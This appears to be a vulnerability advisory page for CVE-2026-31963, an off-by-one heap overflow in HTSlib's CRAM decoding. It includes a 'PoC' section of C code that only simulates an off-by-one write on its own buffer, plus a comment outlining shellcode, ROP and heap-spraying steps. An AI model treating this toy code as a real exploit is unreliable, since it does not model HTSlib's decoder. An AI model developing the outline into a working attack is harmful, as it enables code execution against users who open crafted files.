Security Vulnerability Report
CVE-2026-31963 CVSS 8.1 HIGH

CVE-2026-31963

Published: 2026-03-18 19:16:04
Last Modified: 2026-03-19 14:50:55

Description

HTSlib is a library for reading and writing bioinformatics file formats. CRAM is a compressed format which stores DNA sequence alignment data. As one method of removing redundant data, CRAM uses reference-based compression so that instead of storing the full sequence for each alignment record it stores a location in an external reference sequence along with a list of differences to the reference at that location as a sequence of "features". When decoding these features, an out-by-one error in a test for CRAM features that appear beyond the extent of the CRAM record sequence could result in an invalid write of one attacker-controlled byte beyond the end of a heap buffer. Exploiting this bug causes a heap buffer overflow. If a user opens a file crafted to exploit this issue, it could lead to the program crashing, or overwriting of data and heap structures in ways not expected by the program. It may be possible to use this to obtain arbitrary code execution. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:htslib:htslib:1.23:*:*:*:*:*:*:* - VULNERABLE
htslib < 1.21.1
htslib < 1.22.2
htslib < 1.23.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
// CVE-2026-31963 PoC - Heap Buffer Overflow in HTSlib CRAM decoding
// This PoC demonstrates the off-by-one error in CRAM feature decoding
// Note: This is a conceptual PoC; actual exploitation requires specific CRAM file crafting
#include <stdint.h>   // uint8_t / uint32_t (missing from the original listing)
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Simplified CRAM container structure for demonstration
typedef struct {
    uint32_t container_size;
    uint32_t feature_count;
    uint8_t* features;
    uint32_t buffer_size;
} cram_container_t;

// Function to simulate vulnerable CRAM feature decoding
int decode_cram_features(cram_container_t* container) {
    // Allocate buffer based on expected feature count
    uint8_t* heap_buffer = (uint8_t*)malloc(container->feature_count);
    if (!heap_buffer) {
        return -1;
    }
    // Vulnerable code: off-by-one error in boundary check
    // The condition should be "i < container->feature_count" not "i <= ..."
    for (uint32_t i = 0; i <= container->feature_count; i++) {
        // This write can overflow when i == container->feature_count
        // (the read of features[i] is also one byte past its allocation)
        heap_buffer[i] = container->features[i]; // Off-by-one write!
    }
    free(heap_buffer);
    return 0;
}

// Function to create malicious CRAM container
cram_container_t* create_malicious_cram(void) {
    cram_container_t* container = (cram_container_t*)malloc(sizeof(cram_container_t));
    if (!container) {
        return NULL;
    }
    container->container_size = 0;
    container->feature_count = 10;
    container->buffer_size = 10;
    container->features = (uint8_t*)malloc(container->feature_count);
    if (!container->features) {
        free(container);
        return NULL;
    }
    // Fill with controlled data
    memset(container->features, 0x41, container->feature_count);
    return container;
}

int main(void) {
    printf("CVE-2026-31963 PoC - HTSlib CRAM Heap Overflow\n");
    printf("This PoC demonstrates the off-by-one error in CRAM feature decoding\n");
    cram_container_t* malicious = create_malicious_cram();
    if (malicious) {
        decode_cram_features(malicious);
        free(malicious->features);
        free(malicious);
    }
    return 0;
}

/* To exploit this vulnerability:
   1. Create a malicious CRAM file with crafted features
   2. Ensure feature_count is set to trigger the off-by-one condition
   3. Include shellcode or ROP chain in the overflow data
   4. Overwrite adjacent heap structures to gain control
   Note: Actual exploitation requires detailed knowledge of heap layout and may need
   heap spraying techniques to increase reliability. */
```

References

Raw JSON Data
